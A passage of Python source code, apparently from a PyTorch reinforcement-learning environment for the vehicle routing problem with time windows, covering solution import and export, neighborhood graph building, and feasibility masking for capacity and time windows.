return self._get_observation() if not done else None, cost, done, info
def render(self, as_gif: bool = True, **kwargs):
assert self.enable_render, f"Need to specify <enable_render=True> on init."
if as_gif:
assert self.plot_save_dir is not None, f"need to specify directory to save gifs."
if self._step >= 155:
return # can only render max ~155 steps as GIF
b_idx = 0
if self.viewer is None:
if self.bs != 1 and self.debug_lvl > 1:
warnings.warn(f"batch_size > 1. Will only render batch instance with idx={b_idx}.")
# create new viewer object
self.viewer = Viewer(
locs=self.coords[b_idx].cpu().numpy(),
save_dir=self.plot_save_dir,
gif_naming=f"render_ep{self._render_cnt}",
as_gif=as_gif,
add_idx=False,
**kwargs
)
# update buffer and render new tour
self.render_buffer['edges'] = self._get_edges_to_render(b_idx)
self.viewer.update(
buffer=self.render_buffer,
cost=self._total[b_idx].cpu().item(),
n_iters=self._step,
**kwargs
)
return self.viewer.render_rgb()
def load_data(self, batch: List[RPInstance]) -> None:
"""Load a list of RPInstances into the environment."""
self.bs = len(batch)
self._bidx = torch.arange(self.bs, device=self.device)
self.coords = self._stack_to_tensor(batch, 'coords')
self.demands = self._stack_to_tensor(batch, 'demands')
self.tw = self._stack_to_tensor(batch, 'tw')
self.service_time = self._stack_to_tensor(batch, 'service_time')
gs = batch[0].graph_size
assert np.all(np.array([x.graph_size for x in batch]) == gs)
self.graph_size = gs
self.org_service_horizon = self._stack_to_tensor(batch, 'org_service_horizon')
k = batch[0].max_vehicle_number
assert np.all(np.array([x.max_vehicle_number for x in batch]) == k)
# provide slightly more vehicles to make sure we always get a solution for all nodes
self.max_vehicle_number = int(k + np.floor(np.log(k))) #int(k + np.floor(np.sqrt(gs)))
assert np.all(np.array([x.vehicle_capacity for x in batch]) == 1)
self.vehicle_capacity = batch[0].vehicle_capacity # normed to 1.0
assert np.all(np.array([x.service_horizon for x in batch]) == 1)
self.service_horizon = batch[0].service_horizon # normed to 1.0
assert np.all(np.array([x.depot_idx[0] for x in batch]) == 0)
if self.inference:
# compute and keep full distance matrix in memory
self._dist_mat = self.compute_distance_matrix(self.coords)
t_delta = self._dist_mat[:, :, 0]
else:
idx_pair = torch.stack((
torch.arange(0, self.graph_size, device=self.device)[None, :].expand(self.bs, self.graph_size),
self.depot_node[:, None].expand(self.bs, self.graph_size)
), dim=-1).view(self.bs, -1)
idx_coords = self.coords.gather(
dim=1, index=idx_pair[:, :, None].expand(self.bs, -1, 2)
).view(self.bs, -1, 2, 2)
t_delta = (
dimacs_challenge_dist_fn(idx_coords[:, :, 0, :], idx_coords[:, :, 1, :]) /
self.org_service_horizon[self._bidx][:, None]
)
self.time_to_depot = t_delta
if self.debug_lvl > 0:
assert (t_delta >= 0).all()
if ((self.tw[:, :, 1] + self.time_to_depot + self.service_time[:, None])[:, 1:] > 1.0).any():
msg = f"cannot return to the depot when arriving within TW of some customers."
if self.inference:
warnings.warn(msg + f" Applying fix during inference...")
else:
raise RuntimeError(msg)
if self.inference:
# quick and dirty fix for instances where it is not guaranteed that
# one can return to the depot when arriving within any TW of a customer
return_time = (self.tw[:, :, 1] + self.time_to_depot + self.service_time[:, None])
no_return_mask = (return_time > 1.0)
            no_return_mask[:, 0] = False # always false for depot
if (no_return_mask.sum(-1) > self.graph_size * 0.05).any():
warnings.warn(f"Need to fix many TW for return to depot. Consider checking instance.")
delta = return_time[no_return_mask] - 1.0
new_tw = torch.stack((
self.tw[no_return_mask][:, 0],
self.tw[no_return_mask][:, 1]-delta
), axis=-1)
assert (new_tw[:, 1] - new_tw[:, 0] > 0.005).all()
self.tw[no_return_mask] = new_tw
if self.num_samples > 1 or self.pomo:
self._init_sampling()
# init nbh graph sampler if not existing yet (assumes all instances have same graph_size)
if self.nbh_sampler is None:
self.nbh_sampler = GraphNeighborhoodSampler(self.graph_size, k_frac=self.k_nbh_frac)
self._has_instance = True
def clear_cache(self):
"""Clear all object references to tensors."""
self.bs = None
self._bidx = None
self._total = None
self.coords = None
self.demands = None
self.tw = None
self.service_time = None
self.graph_size = None
self.org_service_horizon = None
self.max_vehicle_number = None
self.vehicle_capacity = None
self.service_horizon = None
self.time_to_depot = None
self._visited = None
self._finished = None
self.tour_plan = None
self.active_vehicles = None
self.active_to_plan_idx = None
self.next_index_in_tour = None
self.cur_node = None
self.cur_cap = None
self.cur_time = None
self.cur_time_to_depot = None
self.k_nbh_size = None
self.depot_idx = None
self._tour_batch_idx = None
self.nbh_edges, self.nbh_weights = None, None
self.tour_edges, self.tour_weights = None, None
self.ordered_idx = None
if self.viewer is not None:
self.viewer.close()
self.viewer = None
self.render_buffer = None
self._has_instance = False
self._is_reset = False
self._step = None
def export_sol(self, num_best: int = 3, num_other: int = 3, mode: str = "random") -> Tuple[List[List], List]:
"""
Export the current tour-plans as list (of lists of lists).
-> (original BS, num_best + num_other, max_num_vehicles, max_seq_len)
"""
if self._num_samples > 1:
# select "promising" tours
# first select num_best best solutions
n_smp = num_best + num_other
assert self._num_samples > n_smp, \
f"specified selection of total of {n_smp} samples but env was configured " \
f"with num_samples = {self._num_samples} < {n_smp}!"
cost_idx = self.total_cost.view(-1, self._num_samples).sort(dim=-1).indices
_bs = cost_idx.size(0)
idx = cost_idx[:, :num_best]
t_start = time.time()
if mode == "random":
logger.info(f"export with random sampling...")
# num_other random solutions
if num_other > 0:
rnd_idx = self._randint(bs=_bs, n=num_other, high=self._num_samples-num_best)
rnd_idx = cost_idx[:, num_best:].gather(dim=-1, index=rnd_idx)
idx = torch.cat((idx, rnd_idx), dim=-1)
# reshape over sample dimension and select samples at index
# from (org BS * n_samples, max_num_vehicles, max_seq_len) ->
tp = self.tour_plan.view(-1, self._num_samples, self.max_vehicle_number, self.tour_plan.size(-1)).gather(
dim=1, index=idx[:, :, None, None].expand(_bs, n_smp, self.max_vehicle_number, self.tour_plan.size(-1))
)
tours = self._sol_to_list(tp)
costs = self.total_cost.view(-1, self._num_samples).gather(dim=-1, index=idx).cpu().tolist()
elif mode == "similarity":
logger.info(f"export with similarity sampling...")
# num_other solutions which are most dissimilar to the best solutions selected
all_tours = self._sol_to_list(
self.tour_plan.view(-1, self._num_samples, self.max_vehicle_number, self.tour_plan.size(-1))
)
tours = []
costs = []
for bst, smps, cst in zip(
idx,
all_tours,
self.total_cost.view(-1, self._num_samples).cpu().tolist()
):
# select best
best_smps = [smps[i] for i in bst]
best_costs = [cst[i] for i in bst]
# select others
other_smps = [smps[i] for i in range(len(smps)) if i not in bst]
other_costs = [cst[i] for i in range(len(smps)) if i not in bst]
# calculate similarity scores of plans
# via (sub-)sequence matching
b = [plan_to_string_seq(p) for p in other_smps]
div_smp_idx = []
for smp in best_smps:
scores = get_similarity_scores(
anchor=plan_to_string_seq(smp),
candidates=b,
)
div_smp_idx.append(np.argsort(scores)) # get indices of lowest scores
# cyclic selection of most diverse other sample for each of the best samples
idx = []
i = 0
j = [0]*num_best
while len(idx) < num_other:
div_idx = div_smp_idx[i][j[i]]
if div_idx not in idx:
idx.append(div_idx)
else:
j[i] += 1
continue
if i < num_best-1:
i += 1
else:
i = 0
tours.append(best_smps + [other_smps[i] for i in idx])
costs.append(best_costs + [other_costs[i] for i in idx])
else:
raise ValueError(f"unknown selection mode: {mode}.")
logger.info(f"export done after {time.time() - t_start: .3f}s.")
return tours, costs
else:
tp = self.tour_plan.view(-1, self._num_samples, self.max_vehicle_number, self.tour_plan.size(-1))
return self._sol_to_list(tp), self.total_cost.clone().cpu().tolist()
def _sol_to_list(self, tp: torch.Tensor):
# handles solutions which contain unvisited nodes as singleton tours
# for loop is OK here, normally we only export solutions for small amounts of instances
tours = []
full_set = set(range(self.graph_size))
for plans in tp:
tour_set = []
for plan in plans:
unq = torch.unique(plan)
singletons = []
# if len(unq) != self.graph_size:
# singletons = [[0, e, 0] for e in full_set - set(unq.cpu().tolist())]
# plan = plan[plan.sum(-1) > 0].cpu()
# tour_set.append([[0] + tp[tp > 0].tolist() + [0] for tp in plan] + singletons)
if len(unq) != self.graph_size:
singletons = [[e] for e in full_set - set(unq.cpu().tolist())]
plan = plan[plan.sum(-1) > 0].cpu()
tour_set.append([tp[tp > 0].tolist() for tp in plan] + singletons)
tours.append(tour_set)
return tours
def import_sol(self, sol: List[List], cost: Optional[List] = None) -> RPObs:
"""Import partial RP solutions represented in a list of lists format
and update buffers and state correspondingly."""
# CONVENTION: all 'complete' tours start and end at the depot idx.
# all other tours are considered partial tours or singletons
# resulting from the destruction procedure.
# sol: (BS, num_samples, num_tours, ...)
assert self.inference, f"Can only import solutions in inference mode."
# check dims
org_bs = self.bs // self.num_samples # number of instances
assert len(sol) == org_bs
n_samples = np.array([len(s) for s in sol])
assert np.all(n_samples == n_samples[0])
n_samples = n_samples[0]
if self.pomo:
assert self.num_samples == n_samples, f"imported solutions for POMO must include num_samples " \
f"samples, but got {n_samples} != {self.num_samples}"
else:
assert self.num_samples % n_samples == 0
sample_fact = self.num_samples // n_samples
# reset buffers
# instead of re-creating the tensors we just fill them with the correct reset values
self._visited.fill_(value=0)
self._finished.fill_(value=0)
self.tour_plan.fill_(value=0)
self.active_vehicles.fill_(value=0)
self.next_index_in_tour.fill_(value=0)
self.cur_node.fill_(value=0)
self.cur_cap.fill_(value=self.vehicle_capacity)
self.cur_time.fill_(value=0)
self.cur_time_to_depot.fill_(value=0)
recompute_cost = False
if cost is not None:
self._total = torch.tensor(cost, dtype=self._total.dtype, device=self.device)
else:
recompute_cost = True
total_costs = []
# read in solutions
bs_idx = 0
for inst_sol in sol:
for smp in inst_sol:
# partial tours are all non-singleton tours which do not start and end at the depot
num_partial = 0
t_idx = 0
service_tm = self.service_time[bs_idx]
costs = []
for tour in smp:
l = len(tour)
if l > 1:
try:
# complete
if tour[0] == tour[-1] == self.depot_node[0]: # starts and ends at depot node
# just add to tour plan
self.tour_plan[bs_idx, t_idx, :l-1] = torch.tensor(
tour[1:], dtype=self.tour_plan.dtype, device=self.device
)
self._finished[bs_idx, t_idx] = True
if recompute_cost:
costs.append(self._recompute_cost(tour, bs_idx, service_tm))
# partial
else:
t = torch.tensor(tour, dtype=torch.long, device=self.device)
self.tour_plan[bs_idx, t_idx, :l] = t.to(dtype=self.tour_plan.dtype)
# add to cumulative buffers
self.cur_node[bs_idx, num_partial] = t[-1]
self.cur_cap[bs_idx, num_partial] = (
1.0 - self.demands[bs_idx].gather(dim=-1, index=t).sum()
)
self.cur_time_to_depot[bs_idx, num_partial] = self.time_to_depot[bs_idx, t[-1]]
# recalculate current time of vehicle
tm = self._recompute_cost(t, bs_idx, service_tm)
if recompute_cost:
costs.append(tm)
self.cur_time[bs_idx, num_partial] = tm
self.next_index_in_tour[bs_idx, num_partial] = len(t)
self.active_vehicles[bs_idx, t_idx] = True
num_partial += 1
except IndexError:
raise RuntimeError(f"Number of tours of provided solution "
f"is larger than max_num_vehicles!")
t_idx += 1
# singleton tour
else:
pass # nothing to do in this case
# check if number of partial tours <= max_concurrent_vehicles
assert num_partial <= self.max_concurrent_vehicles
must_assign = self.max_concurrent_vehicles-num_partial
if must_assign > 0:
# start a new tour for each non existing partial tour
for i in range(num_partial, num_partial+must_assign):
nxt_active = self._get_next_active_vehicle()[bs_idx]
self.active_vehicles[bs_idx, nxt_active] = 1
self.active_to_plan_idx[bs_idx, i] = nxt_active
# adapt visitation status
nz = self.tour_plan[bs_idx].nonzero(as_tuple=True)
self._visited[bs_idx, self.tour_plan[bs_idx, nz[0], nz[1]].long()] = 1
if recompute_cost:
total_costs.append(sum(costs))
# inc per sample
bs_idx += sample_fact
if recompute_cost:
self._total = torch.tensor(total_costs, dtype=self.fp_precision, device=self.device)
# re-expand if the number of samples changed during selection procedure
# POMO sampling will always do the expansion during the destruction procedure,
# but standard sampling needs it here explicitly
if n_samples != self.num_samples:
self._expand_sample_dimension(sample_fact)
#
self.active_to_plan_idx = self.active_vehicles.nonzero(as_tuple=True)[1].view(self.bs, -1)
# re-create graph
self.to_graph()
self._has_instance = True
self._is_reset = True
self._step = (self._visited.sum(-1) + self._finished.sum(-1)).max().cpu().item()
return self._get_observation()
def _recompute_cost(self, tour: Union[List, torch.Tensor], bs_idx: int, service_time: float):
# recalculate current time of vehicle
tm = 0
prev = 0
for nxt in tour:
# select from distance matrix
tm += self._dist_mat[bs_idx, prev, nxt]
# add waiting time and service time
tm += ((self.tw[bs_idx, nxt][0] - tm).clamp_(min=0) + service_time)
prev = nxt
return tm.cpu().item()
def destruct(self, **kwargs):
"""Tensor-based native destruction operator circumventing
expensive conversion to lists during solution export/import."""
raise NotImplementedError
@staticmethod
def _cumsum0(t: torch.Tensor) -> torch.Tensor:
"""calculate cumsum of t starting at 0."""
return torch.cat((
torch.zeros(1, dtype=t.dtype, device=t.device),
torch.cumsum(t, dim=-1)[:-1]
), dim=0)
@property
def depot_node(self) -> torch.Tensor:
"""idx of depot node is always 0."""
if self._zero.device != self.device:
self._zero = self._zero.to(device=self.device)
return self._zero[:, None].expand(-1, self.bs).view(-1)
@property
def idx_inc(self) -> torch.Tensor:
"""Returns the index increase necessary to
transform to BS x N running index."""
assert self.depot_idx is not None and len(self.depot_idx) == self.bs
return self.depot_idx
@property
def visited(self) -> torch.BoolTensor:
"""Returns mask for all nodes without depot (BS, N-1),
indicating if the respective node was already visited."""
return self._visited[:, 1:]
@property
def k_used(self) -> torch.Tensor:
"""Returns the number of vehicles used for each instance."""
_active = self.active_vehicles.clone()
_active[self.active_vehicles] = (self.cur_node != self.depot_node[:, None]).view(-1)
return (self._finished | _active).sum(-1)
@property
def total_cost(self) -> torch.Tensor:
"""return the current total cost of the solution."""
return self._total.clone()
@property
def num_samples(self):
return self._num_samples
def to_graph(self) -> None:
"""Create static nbh graph and dynamic tour graph components."""
if self.depot_idx is None:
# starting node indices of each batch instance are exactly depot
self.depot_idx = self._cumsum0(
torch.from_numpy(np.full(self.bs, self.graph_size))
.to(dtype=torch.long, device=self.device)
)
if self._tour_batch_idx is None:
self._tour_batch_idx = torch.arange(self.bs, device=self.device)[:, None].expand(-1, self.max_vehicle_number)
# nbh graph is static and only needs to be created at start of episode
if self.nbh_edges is None or self.nbh_weights is None:
nbh_edges, nbh_weights = [], []
for i, c in enumerate(self.coords):
e = self.nbh_sampler(c)
nbh_edges.append(e + self.idx_inc[i]) # increase node indices by running idx
# calculate weights
idx_coords = c[e]
nbh_weights.append(
dimacs_challenge_dist_fn(idx_coords[0], idx_coords[1])/self.org_service_horizon[i]
)
self.nbh_edges = torch.cat(nbh_edges, dim=-1)
self.nbh_weights = torch.cat(nbh_weights, dim=-1)
self.k_nbh_size = self.nbh_sampler.k
if self.tour_edges is None or self.tour_weights is None:
# initialize - no tours exist
# create just dummy edges from depot to depot
self.tour_edges = torch.cat((self.depot_idx[None, :], self.depot_idx[None, :]), dim=0)
self.tour_weights = torch.zeros(self.bs, dtype=self.fp_precision, device=self.device)
elif (self._step <= self.max_concurrent_vehicles+1) or (self._step % self.tour_graph_update_step == 0):
# infer edges from current routes
# select all routes which are either finished or active (partial solutions)
selection_mask = self._finished | self.active_vehicles
# increase to running idx and get corresponding node indices
#tours = (self.tour_plan + self.idx_inc[:, None, None])[selection_mask]
tours = (
self.tour_plan[selection_mask] +
self.idx_inc[:, None, None].expand(-1, selection_mask.size(-1), 1)[selection_mask]
)
if self.debug_lvl > 1:
assert (tours[:, -1] == self.depot_idx.repeat_interleave(selection_mask.sum(-1), dim=-1)).all()
sbl = tours.size(-1)
tours = tours.view(-1, sbl) # (BS, max_concurrent, seq_buffer_len) -> (-1, seq_buffer_len)
# create edges as node idx pairs
# automatically adds an edge from the last node back to the depot
tours = torch.cat((
torch.roll(tours, shifts=1, dims=-1)[:, None, :], # cyclic shift by 1
tours[:, None, :]
), axis=1).permute(1, 0, 2).reshape(2, -1)
tour_batch_idx = self._tour_batch_idx[selection_mask]
# remove dummies (depot self loops)
selection_mask = (tours[0, :] != tours[1, :])
self.tour_edges = tours[:, selection_mask]
# get weights
# TODO: better way than with tour_batch_idx which is only used here?!
tour_batch_idx = (
tour_batch_idx[:, None].expand(-1, sbl).reshape(-1)
)[selection_mask]
if self.inference:
# select from distance matrix
idx = self.tour_edges - self.idx_inc[tour_batch_idx]
self.tour_weights = self._dist_mat[tour_batch_idx][
torch.arange(tour_batch_idx.size(0), device=self.device), idx[0,], idx[1,]
]
else:
# compute on the fly
idx_coords = self.coords.view(-1, 2)[self.tour_edges]
self.tour_weights = (
dimacs_challenge_dist_fn(idx_coords[0], idx_coords[1]) /
self.org_service_horizon[tour_batch_idx]
)
else:
# no update to tour graph
self.tour_edges = torch.empty(0)
self.tour_weights = torch.empty(0)
def get_node_nbh(self, node_idx: torch.Tensor) -> torch.LongTensor:
"""Return the neighborhood of the specified nodes."""
assert node_idx.size(0) == self.bs
depot_mask = (node_idx == 0)
if depot_mask.any():
# first N elements in self.nbh_edges[0] are depot nbh
depot_nbh = self.nbh_edges.view(2, self.bs, -1)[:, :, :self.graph_size]
if self.ordered_idx is None:
# order the nodes in the depot nbh by their distance to depot
idx_coords = self.coords.view(-1, 2)[depot_nbh.reshape(2, -1)]
# here euclidean distance is sufficient
self.ordered_idx = torch.norm(idx_coords[0]-idx_coords[1], p=2, dim=-1)\
.view(self.bs, -1)\
.argsort(dim=-1, descending=False)
# first check visitation status
vis_mask = ~self._visited.gather(dim=-1, index=self.ordered_idx)
# get mask of the first 'nbh_size' closest unvisited nodes
_msk = vis_mask.cumsum(dim=-1) <= self.k_nbh_size
mask = torch.zeros_like(vis_mask)
mask[_msk] = vis_mask[_msk]
# if there are less than 'nbh_size' unvisited nodes, correct mask
# since we always need at least 'nbh_size' nodes for batching,
# they will just be masked in the selection procedure
missing_to_nbh_size = -mask.sum(-1) + self.k_nbh_size
missing = missing_to_nbh_size > 0
if missing.any():
# create mask of the first 'missing_to_nbh_size' positions to set to true
zmsk = ~mask[missing]
zmsk = (
zmsk.cumsum(-1) == missing_to_nbh_size[missing, None]
).fliplr().cumsum(-1).fliplr().to(torch.bool)
_msk = torch.zeros_like(mask)
_msk[missing] = zmsk
mask[_msk] = 1
# select corresponding node indices
select_idx = self.ordered_idx[mask].view(self.bs, -1)
depot_nbh = depot_nbh[0].gather(dim=-1, index=select_idx)
if depot_mask.all():
return (
depot_nbh[:, None, :].expand(self.bs, self.max_concurrent_vehicles, -1) -
self.idx_inc[:, None, None]
)
# get other node nbh
nbh = self.nbh_edges.view(2, self.bs, -1)[:, :, self.graph_size:]
nbh = (
nbh[0].view(self.bs, self.graph_size-1, self.k_nbh_size)
# here we just clamp to enable the gather operation on dummy depot node indices,
# they are then replaced below
.gather(dim=1, index=(torch.clamp(node_idx-1, min=0))[:, :, None].expand(self.bs, -1, self.k_nbh_size))
)
if depot_mask.any():
# replace depot nbh
nbh[depot_mask] = depot_nbh.repeat_interleave(depot_mask.sum(-1), dim=0)
return nbh - self.idx_inc[:, None, None]
def compute_distance_matrix(self, coords: torch.Tensor, normalize: bool = True) -> torch.Tensor:
"""Calculate (BS, N, N) distance (transit) matrix."""
if normalize:
return self._compute_normed_distance_matrix(coords, self.org_service_horizon)
else:
return dimacs_challenge_dist_fn(coords[:, :, None, :], coords[:, None, :, :])
@staticmethod
@torch.jit.script
def _compute_normed_distance_matrix(coords: torch.Tensor, denom: torch.Tensor) -> torch.Tensor:
return (
dimacs_challenge_dist_fn(coords[:, :, None, :], coords[:, None, :, :]) /
denom[:, None, None]
)
def _randint(self, bs: int, n: int, high: int, low: int = 0, replace: bool = False):
"""Draws n random integers between low (inc) and high (exc) for batch of size bs."""
if self._one.device != self.device:
self._one = self._one.to(device=self.device)
return torch.multinomial(
self._one[:, None, None].expand(-1, bs, high).view(bs, high),
n, replacement=replace) + low
def _get_nbh_and_mask(self) -> Tuple[torch.LongTensor, torch.BoolTensor]:
"""Returns the NBH of each node at which an active vehicle currently is positioned.
Moreover, creates a feasibility mask over this NBH by
- checking if node was already visited
- checking if remaining capacity of vehicle is sufficient
- checking if the node can still be served by the current vehicle within the respective TW
Returns:
nbh: (BS, max_concurrent, NBH),
mask: (BS, max_concurrent, NBH)
"""
# get node neighborhood of current nodes
nbh = self.get_node_nbh(self.cur_node)
# start creating mask (True where infeasible)
# self-loops are masked automatically, since they just have been set as visited in step()
# check which nodes were already visited
mask = self._visited[:, None, :]\
.expand(self.bs, self.max_concurrent_vehicles, -1)\
.gather(dim=-1, index=nbh)
# feasibility regarding capacity
exceeds_cap = self.cur_cap[:, :, None] < self.demands[:, None, :]\
.expand(self.bs, self.max_concurrent_vehicles, -1)\
.gather(dim=-1, index=nbh)
# feasibility regarding (hard) TWs
# check if current time of vehicle + travel time to a node is smaller than
# the latest start time of that node
if self.inference:
# select from distance matrix
d = self.max_concurrent_vehicles * self.k_nbh_size
t_delta = self._dist_mat[
self._bidx[:, None].expand(-1, d).reshape(-1),
self.cur_node[:, :, None]
.expand(self.bs, self.max_concurrent_vehicles, self.k_nbh_size)
.reshape(-1),
nbh.view(-1)
].view(self.bs, self.max_concurrent_vehicles, -1)
else:
# compute on the fly
idx_pair = torch.stack((
self.cur_node[:, :, None].expand(self.bs, self.max_concurrent_vehicles, self.k_nbh_size).reshape(self.bs, -1),
nbh.view(self.bs, -1)
), dim=-1).view(self.bs, -1)
idx_coords = self.coords.gather(
dim=1, index=idx_pair[:, :, None].expand(self.bs, -1, 2)
).view(self.bs, -1, 2, 2)
t_delta = (
dimacs_challenge_dist_fn(idx_coords[:, :, 0, :], idx_coords[:, :, 1, :]) /
self.org_service_horizon[self._bidx][:, None]
).view(self.bs, self.max_concurrent_vehicles, -1)
arrival_time = self.cur_time[:, :, None] + t_delta
exceeds_tw = arrival_time > (
self.tw[:, :, -1][:, None, :]
.expand(self.bs, self.max_concurrent_vehicles, self.graph_size)
.gather(dim=-1, index=nbh)
)
at_depot = self.cur_node == 0
# debug checks
if self.debug_lvl > 1:
if (
not (self._get_next_active_vehicle() == 0).any() and
not self.visited.all(-1).any() and
not self.inference
):
assert self.cur_time[at_depot].sum() == 0
assert (self.cur_cap[at_depot] - 1).sum() == 0
assert self.cur_time_to_depot[at_depot].sum() == 0
assert t_delta[at_depot][:, 0].sum() == 0
assert exceeds_cap[at_depot].sum() == 0
assert exceeds_tw[at_depot].sum() == 0
# in case there is a vehicle starting from the depot
# and there is at least one unvisited node and one unused vehicle left
# then we mask the depot node
mask_depot = (
~self.visited.all(-1) &
((self._finished.sum(-1) < self.max_concurrent_vehicles) | (self._get_next_active_vehicle() != 0))
)
mask_depot = at_depot & mask_depot[:, None].expand(-1, self.max_concurrent_vehicles)
if mask_depot.any():
mask[mask_depot, torch.zeros(mask_depot.sum(), dtype=torch.long, device=self.device)] = 1
# combine masks
mask = mask | exceeds_cap | exceeds_tw
if (mask.all(-1)).any():
raise RuntimeError(f"no feasible nodes left: {mask.all(-1).nonzero()}")
return nbh, mask
def _stack_to_tensor(self,
batch: List[RPInstance],
key: Union[str, int],
dtype: Optional[torch.dtype] = None
) -> torch.Tensor:
"""Takes a list of instances and stacks the attribute
indicated by 'key' into a torch.Tensor."""
return torch.from_numpy(
np.stack([x[key] for x in batch], axis=0)
).to(dtype=dtype if dtype is not None else self.fp_precision, device=self.device).contiguous()
def _get_next_active_vehicle(self) -> torch.LongTensor:
"""
Return the index of the next available vehicle.
If no vehicles are available anymore, returns 0.
"""
return torch.argmin((self._finished | self.active_vehicles).to(torch.int), dim=-1)
def _get_observation(self) -> RPObs:
"""Gather the current observations."""
nbh, mask = self._get_nbh_and_mask()
return RPObs(
batch_size=self.bs,
node_features=torch.cat((
self.coords,
self.demands[:, :, None],
self.tw,
self.service_time[:, None, None].expand(self.bs, self.graph_size, 1),
self.time_to_depot[:, :, None],
), dim=-1),
node_nbh_edges=self.nbh_edges,
node_nbh_weights=self.nbh_weights,
# only select active
tour_plan=self.tour_plan.gather(
dim=1, index=self.active_to_plan_idx[:, :, None].expand(self.bs, -1, self.tour_plan.size(-1))
).to(dtype=torch.long),
# these are just the features of currently active tours!
tour_features=torch.cat((
self.cur_node[:, :, None], # just node idx!
self.cur_cap[:, :, None],
self.cur_time[:, :, None],
self.cur_time_to_depot[:, :, None],
# last entry encodes 'vehicle id' as well as 'number of remaining vehicles'
((-self.active_to_plan_idx + self.max_vehicle_number)/self.max_vehicle_number)[:, :, None],
), dim=-1),
tour_edges=self.tour_edges,
tour_weights=self.tour_weights,
nbh=nbh,
nbh_mask=mask,
)
def _update(self,
tour_select: torch.LongTensor,
next_node: torch.LongTensor,
non_depot_mask: torch.BoolTensor,
) -> torch.Tensor:
"""Update tours."""
previous_node = self.cur_node[self._bidx, tour_select]
# update node
self.cur_node[self._bidx, tour_select] = next_node
# update load
self.cur_cap[self._bidx, tour_select] = (
self.cur_cap[self._bidx, tour_select] - self.demands[self._bidx, next_node]
)
if self.check_feasibility:
assert (self.cur_cap[self._bidx, tour_select] >= 0).all()
# update time
if self.inference:
# select from distance matrix
cur_time_delta = self._dist_mat[self._bidx, previous_node, next_node]
else:
# compute on the fly
idx_pair = torch.stack((previous_node, next_node), dim=0)
idx_coords = self.coords[self._bidx, idx_pair]
cur_time_delta = (
dimacs_challenge_dist_fn(idx_coords[0], idx_coords[1]) /
self.org_service_horizon[self._bidx]
)
tw = self.tw[self._bidx, next_node]
arrival_time = self.cur_time[self._bidx, tour_select] + cur_time_delta
if self.check_feasibility:
if not (arrival_time <= tw[:, 1]).all():
inf_msk = (arrival_time > tw[:, 1])
td = arrival_time[inf_msk] - tw[inf_msk, 1]
raise RuntimeError(f"arrival time exceeds TW "
f"at idx: {inf_msk.nonzero()} w"
f"ith time diff of {td}, "
f"which equals {td/(1/self.org_service_horizon[inf_msk])} eps.")
# add waiting time and service time for non-depot nodes
cur_time_delta[non_depot_mask] = (
cur_time_delta[non_depot_mask] +
((tw[:, 0] - arrival_time).clamp_(min=0) + self.service_time[self._bidx])[non_depot_mask]
)
self.cur_time[self._bidx, tour_select] = self.cur_time[self._bidx, tour_select] + cur_time_delta
# update time to depot
time_to_depot_delta = self.time_to_depot[self._bidx, next_node]
previous_time_to_depot = self.cur_time_to_depot[self._bidx, tour_select]
self.cur_time_to_depot[self._bidx, tour_select] = time_to_depot_delta
# calculate cost
cost = cur_time_delta + (time_to_depot_delta - previous_time_to_depot)
return cost
def _return_all(self) -> torch.Tensor:
"""Return all vehicles to depot and update corresponding buffers and cost."""
must_return = (self.cur_node != self.depot_node[:, None])
cost = self._zero
if must_return.any():
next_node = self.depot_node[:, None].expand(-1, self.max_concurrent_vehicles).clone()
previous_node = self.cur_node.clone()
# update node
self.cur_node = next_node.clone()
# update time
if self.inference:
# select from distance matrix
cur_time_delta = self._dist_mat[
self._bidx[:, None].expand(self.bs, self.max_concurrent_vehicles).reshape(-1),
previous_node.view(-1),
next_node.view(-1)
].view(self.bs, self.max_concurrent_vehicles)
else:
# compute on the fly
idx_pair = torch.stack((previous_node, next_node), dim=-1).view(self.bs, -1)
idx_coords = self.coords.gather(
dim=1, index=idx_pair[:, :, None].expand(self.bs, -1, 2)
).view(self.bs, -1, 2, 2)
cur_time_delta = (
dimacs_challenge_dist_fn(idx_coords[:, :, 0, :], idx_coords[:, :, 1, :]) /
self.org_service_horizon[self._bidx][:, None]
).view(self.bs, self.max_concurrent_vehicles)
self.cur_time = self.cur_time + cur_time_delta
if self.check_feasibility:
assert (self.cur_time <= 1.0).all()
# update time to depot
self.cur_time_to_depot[:, :] = 0
# calculate cost
cost = cur_time_delta.sum(dim=-1)
return cost.to(dtype=self.fp_precision)
def _get_edges_to_render(self, b_idx: int = 0) -> List[np.ndarray]:
"""Select instance with b_idx and return corresponding edges as list of arrays."""
# select all routes which are either finished or active (partial solutions)
selection_mask = self._finished[b_idx] | self.active_vehicles[b_idx]
tours = self.tour_plan[b_idx][selection_mask]
max_pos = torch.argmin(tours, dim=-1)
truncated_tours = []
for tr, pos, fin in zip(tours, max_pos, self._finished[b_idx][selection_mask]):
trtr = tr[:pos+1]
if len(trtr) > 1:
trtr = torch.cat((
torch.roll(trtr, shifts=1, dims=-1)[:, None], # cyclic shift by 1
trtr[:, None]
), axis=1).T
truncated_tours.append(trtr[:, :pos+fin].view(2, -1).cpu().numpy())
return truncated_tours
def _init_sampling(self):
"""Expand currently loaded instance(s) over sampling dimension."""
bs, n, _ = self.coords.size()
self.coords = self.coords[:, None, :, :].expand(bs, self._num_samples, n, 2).reshape(-1, n, 2).contiguous()
self.demands = self.demands[:, None, :].expand(self.bs, self._num_samples, n).reshape(-1, n)
self.tw = self.tw[:, None, :, :].expand(bs, self._num_samples, n, 2).reshape(-1, n, 2)
self.service_time = self.service_time[:, None].expand(self.bs, self._num_samples).reshape(-1)
self.time_to_depot = self.time_to_depot[:, None, :].expand(self.bs, self._num_samples, n).reshape(-1, n)
self.org_service_horizon = self.org_service_horizon[:, None].expand(self.bs, self._num_samples).reshape(-1)
if self.inference and self._dist_mat is not None:
self._dist_mat = self._dist_mat[:, None, :, :].expand(self.bs, self._num_samples, n, n).reshape(-1, n, n)
self.bs = int(self.bs * self._num_samples)
self._bidx = torch.arange(self.bs, device=self.device)
def _expand_sample_dimension(self, samples_fact: int):
"""Re-expand sampling dimension from imported selection to original sampling dimension."""
cur_idx = torch.arange(0, self.num_samples, samples_fact, device=self.device)
self._visited = self._visited[cur_idx].repeat_interleave(samples_fact, dim=0)
self._finished = self._finished[cur_idx].repeat_interleave(samples_fact, dim=0)
self.tour_plan = self.tour_plan[cur_idx].repeat_interleave(samples_fact, dim=0)
self.active_vehicles = self.active_vehicles[cur_idx].repeat_interleave(samples_fact, dim=0)
self.next_index_in_tour = self.next_index_in_tour[cur_idx].repeat_interleave(samples_fact, dim=0)
self.cur_node = self.cur_node[cur_idx].repeat_interleave(samples_fact, dim=0)
self.cur_cap = self.cur_cap[cur_idx].repeat_interleave(samples_fact, dim=0)
